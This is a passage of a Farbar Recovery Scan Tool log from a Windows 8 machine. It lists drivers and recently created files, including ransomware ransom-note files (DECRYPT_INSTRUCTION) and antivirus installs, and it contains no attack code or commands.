C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-09-23] (AVAST Software) R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-09-23] () R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1041168 2014-09-23] (AVAST Software) R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [427360 2014-09-23] (AVAST Software) R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [92008 2014-09-23] (AVAST Software) R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [224896 2014-09-23] () R3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-07-02] (Qualcomm Atheros) R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink) S3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2012-08-04] (OSR Open Systems Resources, Inc.) R1 ElRawDisk; C:\Windows\system32\drivers\ElRawDsk.sys [30752 2013-05-29] (EldoS Corporation) S1 FileDisk; No ImagePath R3 hcwE5bda; C:\Windows\system32\drivers\hcwE5bda.sys [950384 2013-03-05] (Hauppauge Computer Work, Inc.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-23] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-05-12] (Malwarebytes Corporation) S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2014-02-04] () R1 RawDisk3; C:\Windows\system32\drivers\rawdsk3.sys [32912 2014-08-12] (EldoS Corporation) R3 SensorsSimulatorDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [198656 2012-07-25] (Microsoft Corporation) R0 SysCow; C:\Windows\System32\drivers\syscowad64v.sys [164848 2010-05-23] (Sonic Solutions) S1 celffluo; \??\C:\Windows\system32\drivers\celffluo.sys [X] S1 evtuidgg; \??\C:\Windows\system32\drivers\evtuidgg.sys [X] S1 hthhwdkn; \??\C:\Windows\system32\drivers\hthhwdkn.sys [X] S3 PCDSRVC{D3412D80-CF3B4A27-06020200}_0; \??\c:\program files\my dell\pcdsrvc_x64.pkms [X] S1 pqgeqfex; \??\C:\Windows\system32\drivers\pqgeqfex.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-23 13:34 - 2014-09-23 13:35 - 00029241 _____ () C:\Users\Kulle\Desktop\FRST.txt 2014-09-23 13:33 - 2014-09-23 13:34 - 00000000 ____D () C:\FRST 2014-09-23 13:31 - 2014-09-23 13:31 - 02106368 _____ (Farbar) C:\Users\Kulle\Desktop\FRST64.exe 2014-09-23 13:04 - 2014-09-23 13:04 - 00015872 _____ () C:\Users\Kulle\Desktop\DECRYPTED-file.xls 2014-09-23 03:54 - 2014-09-23 03:54 - 00000000 ___RD () C:\Users\Kulle\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices 2014-09-23 02:43 - 2014-09-23 12:48 - 00003208 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-23 02:17 - 2014-09-23 02:17 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\AVAST Software 2014-09-23 02:14 - 2014-09-23 02:14 - 00001928 _____ () C:\Users\Public\Desktop\avast! Free Antivirus.lnk 2014-09-23 02:14 - 2014-09-23 02:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast 2014-09-23 02:13 - 2014-09-23 02:17 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update 2014-09-23 02:13 - 2014-09-23 02:13 - 00427360 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys 2014-09-23 02:13 - 2014-09-23 02:12 - 01041168 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys 2014-09-23 02:13 - 2014-09-23 02:12 - 00307344 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe 2014-09-23 02:13 - 2014-09-23 02:12 - 00224896 _____ () C:\Windows\system32\Drivers\aswVmm.sys 2014-09-23 02:13 - 2014-09-23 02:12 - 00093568 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys 2014-09-23 02:13 - 2014-09-23 02:12 - 00092008 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys 2014-09-23 02:13 - 2014-09-23 02:12 - 00079184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys 2014-09-23 02:13 - 2014-09-23 02:12 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys 2014-09-23 02:13 - 2014-09-23 02:12 - 00029208 _____ () C:\Windows\system32\Drivers\aswHwid.sys 2014-09-23 02:12 - 2014-09-23 02:12 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr 2014-09-23 02:11 - 2014-09-23 02:11 - 00000000 ____D () C:\Program Files\AVAST Software 2014-09-23 02:10 - 2014-09-23 02:10 - 04862664 _____ (AVAST Software) C:\Users\Kulle\Downloads\avast_free_antivirus_setup_online.exe 2014-09-22 18:28 - 2014-09-22 18:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation 2014-09-22 18:27 - 2014-09-22 18:27 - 00000000 ____D () C:\Users\Kulle\AppData\Local\NVIDIA 2014-09-22 18:16 - 2014-07-02 10:44 - 00609240 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe 2014-09-22 18:14 - 2014-08-29 22:48 - 10115072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll 2014-09-22 18:14 - 2014-08-29 22:47 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2014-09-22 18:14 - 2014-08-29 22:46 - 02306560 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll 2014-09-22 18:14 - 2014-08-29 21:05 - 08858112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll 2014-09-22 18:14 - 2014-08-29 21:04 - 02416128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-09-22 18:14 - 2014-08-29 21:03 - 02037760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll 2014-09-22 18:14 - 2014-08-01 15:08 - 00388729 _____ () C:\Windows\system32\ApnDatabase.xml 2014-09-22 18:14 - 2014-07-24 06:50 - 00447296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS 2014-09-22 18:14 - 2014-07-16 16:28 - 00027648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll 2014-09-22 18:14 - 2014-07-16 15:59 - 00305664 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll 2014-09-22 18:14 - 2014-07-16 15:59 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll 2014-09-22 18:14 - 2014-07-11 23:45 - 01549824 _____ (Microsoft Corporation) C:\Windows\system32\msdtctm.dll 2014-09-22 18:14 - 2014-07-11 21:36 - 00674304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys 2014-09-22 18:14 - 2014-07-11 21:36 - 00211456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys 2014-09-22 18:14 - 2014-07-11 21:34 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys 2014-09-22 18:14 - 2014-07-11 21:34 - 00250368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys 2014-09-22 18:14 - 2014-06-27 23:57 - 01341952 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll 2014-09-22 18:14 - 2014-06-27 19:23 - 01126400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll 2014-09-22 18:14 - 2014-06-12 16:34 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll 2014-09-22 18:14 - 2014-06-12 16:29 - 02146304 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll 2014-09-22 18:11 - 2014-09-22 18:11 - 00002182 _____ () C:\Users\Kulle\Desktop\Malwarebytes Anti-Malware Premium.txt 2014-09-22 18:07 - 2014-09-22 18:07 - 17291904 _____ (Malwarebytes Corporation ) C:\Users\Kulle\Downloads\mbam_premium.exe 2014-09-22 16:55 - 2014-09-22 16:55 - 00000000 ____D () C:\Program Files\Common Files\DESIGNER 2014-09-22 16:49 - 2014-09-23 12:48 - 00003342 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-22 16:44 - 2014-09-22 16:44 - 00000000 ___SD () C:\Windows\system32\CompatTel 2014-09-22 16:41 - 2014-07-15 15:51 - 00071168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hdaudbus.sys 2014-09-22 16:24 - 2014-08-28 04:34 - 00059400 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe 2014-09-22 16:24 - 2014-08-27 23:05 - 00630272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll 2014-09-22 16:24 - 2014-08-27 23:05 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll 2014-09-22 16:24 - 2014-08-27 23:05 - 00086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll 2014-09-22 16:24 - 2014-08-27 23:05 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe 2014-09-22 16:24 - 2014-08-27 23:02 - 00040448 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe 2014-09-22 16:24 - 2014-08-27 23:01 - 03285504 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll 2014-09-22 16:24 - 2014-08-27 23:01 - 01623552 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll 2014-09-22 16:24 - 2014-08-27 23:01 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll 2014-09-22 16:24 - 2014-08-27 23:01 - 00253440 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll 2014-09-22 16:24 - 2014-08-27 23:01 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll 2014-09-22 16:24 - 2014-08-27 23:01 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll 2014-09-22 16:24 - 2014-08-27 23:01 - 00100352 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll 2014-09-22 16:24 - 2014-08-27 23:01 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\wuaext.dll 2014-09-22 16:23 - 2014-08-20 16:40 - 00732880 _____ (Microsoft Corporation) C:\Windows\system32\NotificationUI.exe 2014-09-22 16:23 - 2014-08-20 10:05 - 00694784 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll 2014-09-22 16:23 - 2014-08-20 10:05 - 00198656 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll 2014-09-22 16:23 - 2014-08-20 10:05 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll 2014-09-22 16:23 - 2014-08-20 10:02 - 00567808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll 2014-09-22 16:23 - 2014-08-20 10:02 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll 2014-09-22 16:23 - 2014-06-24 00:35 - 00010450 _____ () C:\Windows\system32\autoconfig.cab 2014-09-22 16:23 - 2014-06-23 23:40 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll 2014-09-22 16:23 - 2014-03-24 16:42 - 00305152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wusa.exe 2014-09-22 16:23 - 2014-03-24 15:56 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\wusa.exe 2014-09-22 16:13 - 2014-09-22 16:13 - 00456864 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-09-22 16:02 - 2014-06-10 15:44 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe 2014-09-22 16:02 - 2014-06-10 15:43 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe 2014-09-22 16:01 - 2014-06-04 18:12 - 00678600 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll 2014-09-22 16:01 - 2014-06-03 16:12 - 00536776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll 2014-09-22 15:45 - 2014-07-31 16:40 - 01287680 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll 2014-09-22 15:45 - 2014-06-17 16:27 - 01440256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\osk.exe 2014-09-22 15:45 - 2014-06-17 16:24 - 01557504 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe 2014-09-22 15:45 - 2014-06-12 18:57 - 01453400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys 2014-09-22 15:45 - 2014-06-12 18:55 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll 2014-09-22 15:45 - 2014-05-02 22:47 - 03246592 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll 2014-09-22 15:45 - 2014-05-02 20:34 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll 2014-09-22 15:43 - 2014-03-28 01:23 - 19759104 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll 2014-09-22 15:43 - 2014-03-27 23:18 - 17562112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll 2014-09-22 15:19 - 2014-08-16 02:34 - 02239488 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-09-22 15:19 - 2014-08-16 02:34 - 01407488 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-09-22 15:19 - 2014-08-16 02:34 - 00915968 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll 2014-09-22 15:19 - 2014-08-16 02:34 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2014-09-22 15:19 - 2014-08-16 02:33 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-09-22 15:19 - 2014-08-16 02:33 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-09-22 15:19 - 2014-08-16 02:32 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-09-22 15:19 - 2014-08-16 02:32 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-09-22 15:19 - 2014-08-16 02:32 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-09-22 15:19 - 2014-08-16 02:32 - 01508864 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-09-22 15:19 - 2014-08-16 02:32 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2014-09-22 15:19 - 2014-08-16 02:32 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-09-22 15:19 - 2014-08-16 02:32 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-09-22 15:19 - 2014-08-16 02:32 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2014-09-22 15:19 - 2014-08-16 00:37 - 01766400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2014-09-22 15:19 - 2014-08-16 00:37 - 01180672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 13757440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 02055168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2014-09-22 15:19 - 2014-08-16 00:36 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2014-09-22 15:19 - 2014-08-16 00:35 - 01440768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2014-09-22 15:18 - 2014-08-16 02:33 - 19280384 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-09-22 15:18 - 2014-08-16 00:36 - 14369280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2014-09-22 13:46 - 2014-09-22 13:46 - 00005100 _____ () C:\Users\Kulle\Desktop\Malwarebytes Anti-Malware.txt 2014-09-22 13:29 - 2014-09-23 12:52 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-22 13:29 - 2014-09-22 18:08 - 00001068 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-22 13:29 - 2014-09-22 18:08 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-22 13:29 - 2014-05-12 08:19 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-09-22 13:29 - 2014-05-12 08:19 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-09-22 13:29 - 2014-05-12 08:19 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-09-22 13:28 - 2014-09-22 18:08 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-09-22 13:28 - 2014-09-22 13:28 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-22 13:15 - 2014-09-22 13:15 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Kulle\Downloads\mbam-setup-2.0.2.1012.exe 2014-09-22 02:31 - 2014-09-23 03:50 - 00003364 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-22 02:31 - 2014-09-23 03:50 - 00003230 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-2997053151-1021370575-3583938921-1001 2014-09-22 02:16 - 2014-09-23 04:38 - 00004924 _____ () C:\Users\Kulle\Desktop\9-21.txt 2014-09-22 01:05 - 2014-09-22 13:47 - 00000000 __SHD () C:\ProgramData\USB Adapter Updater 2014-09-21 23:47 - 2014-09-21 23:47 - 00008178 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.HTML 2014-09-21 23:47 - 2014-09-21 23:47 - 00008178 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.HTML 2014-09-21 23:47 - 2014-09-21 23:47 - 00004134 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.TXT 2014-09-21 23:47 - 2014-09-21 23:47 - 00004134 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.TXT 2014-09-21 23:47 - 2014-09-21 23:47 - 00000254 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.URL 2014-09-21 23:47 - 2014-09-21 23:47 - 00000254 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.URL 2014-09-21 22:08 - 2014-09-21 22:08 - 00008178 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.HTML 2014-09-21 22:08 - 2014-09-21 22:08 - 00008178 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.HTML 2014-09-21 22:08 - 2014-09-21 22:08 - 00004134 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.TXT 2014-09-21 22:08 - 2014-09-21 22:08 - 00004134 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.TXT 2014-09-21 22:08 - 2014-09-21 22:08 - 00000254 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.URL 2014-09-21 22:08 - 2014-09-21 22:08 - 00000254 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.URL 2014-09-21 19:11 - 2014-09-21 19:11 - 00008178 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.HTML 2014-09-21 19:11 - 2014-09-21 19:11 - 00004134 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.TXT 2014-09-21 19:11 - 2014-09-21 19:11 - 00000254 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.URL 2014-09-21 17:50 - 2014-09-21 17:50 - 00001447 _____ () C:\Users\Kulle\Desktop\LiveBoost.lnk 2014-09-21 17:49 - 2014-08-12 23:38 - 00032912 _____ (EldoS Corporation) C:\Windows\system32\Drivers\rawdsk3.sys 2014-09-21 16:11 - 2014-09-23 02:11 - 00000000 ____D () C:\ProgramData\AVAST Software 2014-09-21 12:51 - 2014-09-21 12:51 - 1944573530 _____ () C:\Windows\MEMORY.DMP 2014-09-21 12:51 - 2014-09-21 12:51 - 00296792 _____ () C:\Windows\Minidump\092114-38125-01.dmp 2014-09-19 04:05 - 2014-09-21 22:08 - 00000792 _____ () C:\Users\Kulle\Desktop\Frequent Pages Listed on New Tab.txt 2014-09-19 03:33 - 2014-05-29 16:31 - 00452608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll 2014-09-19 03:33 - 2014-05-29 16:03 - 00588288 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll 2014-09-19 03:33 - 2014-05-29 16:02 - 01281536 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2014-09-19 03:33 - 2014-05-29 16:02 - 00439808 _____ (Microsoft Corporation) C:\Windows\system32\lsm.dll 2014-09-19 03:27 - 2014-09-04 15:36 - 00755712 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2014-09-19 03:27 - 2014-09-02 18:49 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2014-09-19 03:27 - 2014-06-30 15:42 - 00394240 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll 2014-09-19 03:27 - 2014-06-30 15:42 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll 2014-09-19 03:16 - 2014-07-23 20:33 - 00875688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll 2014-09-19 03:16 - 2014-07-23 20:33 - 00869544 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll 2014-09-19 03:15 - 2014-06-02 15:33 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll 2014-09-19 03:10 - 2014-05-02 23:34 - 06974808 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2014-09-19 03:10 - 2014-05-02 23:33 - 01824808 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2014-09-19 03:10 - 2014-05-02 21:51 - 01408976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll 2014-09-19 03:10 - 2014-05-01 15:37 - 01023488 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll 2014-09-19 03:10 - 2014-04-29 15:32 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\Robocopy.exe 2014-09-19 03:10 - 2014-04-29 15:32 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Robocopy.exe 2014-09-19 03:10 - 2014-04-12 02:27 - 00172888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2014-09-19 03:10 - 2014-04-12 02:10 - 00578048 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2014-09-19 03:10 - 2014-04-12 02:09 - 01043968 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll 2014-09-19 03:10 - 2014-04-12 02:08 - 00827904 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2014-09-19 03:10 - 2014-04-12 02:08 - 00318464 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2014-09-19 03:10 - 2014-04-12 00:23 - 00961536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll 2014-09-19 03:10 - 2014-04-12 00:23 - 00273920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2014-09-19 03:10 - 2014-04-12 00:22 - 00666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2014-09-19 03:10 - 2014-03-10 20:25 - 00100184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2014-09-19 03:10 - 2014-03-10 17:41 - 00559104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll 2014-09-19 03:10 - 2014-03-10 17:38 - 00982016 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll 2014-09-19 03:10 - 2014-03-10 17:38 - 00684032 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll 2014-09-19 03:10 - 2014-03-10 17:38 - 00179712 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll 2014-09-19 03:10 - 2014-03-10 17:38 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2014-09-19 03:10 - 2014-03-09 20:05 - 00668160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll 2014-09-19 03:10 - 2014-03-03 16:07 - 00570216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys 2014-09-19 03:09 - 2014-04-12 02:09 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2014-09-19 03:09 - 2014-04-12 02:09 - 00094720 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2014-09-19 03:09 - 2014-04-12 02:07 - 00020480 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2014-09-19 03:09 - 2014-04-12 00:23 - 00178688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2014-09-19 03:09 - 2014-04-12 00:23 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2014-09-19 03:09 - 2014-04-12 00:22 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2014-09-19 03:09 - 2014-04-11 23:58 - 00014848 _____ (Microsoft Corporation) C:\Windows\system32\workerdd.dll 2014-09-19 03:09 - 2014-03-10 17:41 - 00323072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2014-09-19 03:09 - 2014-03-10 17:41 - 00038400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll 2014-09-19 03:09 - 2014-03-10 17:39 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe 2014-09-19 03:09 - 2014-03-10 17:38 - 00419328 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2014-09-19 03:09 - 2014-03-10 17:38 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll 2014-09-19 03:09 - 2014-03-10 17:38 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll 2014-09-19 03:09 - 2014-03-09 18:27 - 00099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll 2014-09-19 03:07 - 2014-08-22 23:47 - 04036096 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-09-19 03:07 - 2014-07-15 16:03 - 01300992 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2014-09-19 03:07 - 2014-07-11 19:36 - 01023488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll 2014-09-19 02:59 - 2014-05-29 15:24 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys 2014-09-19 02:58 - 2014-04-03 04:22 - 02233176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys 2014-09-19 02:53 - 2014-06-06 07:06 - 00596480 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll 2014-09-19 02:53 - 2014-06-06 03:17 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll 2014-09-19 02:53 - 2014-06-05 10:56 - 00112984 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe 2014-09-19 02:53 - 2014-06-05 10:29 - 00393216 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll 2014-09-19 02:52 - 2014-06-19 16:35 - 01312768 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll 2014-09-19 02:52 - 2014-06-19 15:24 - 00694272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll 2014-09-19 02:52 - 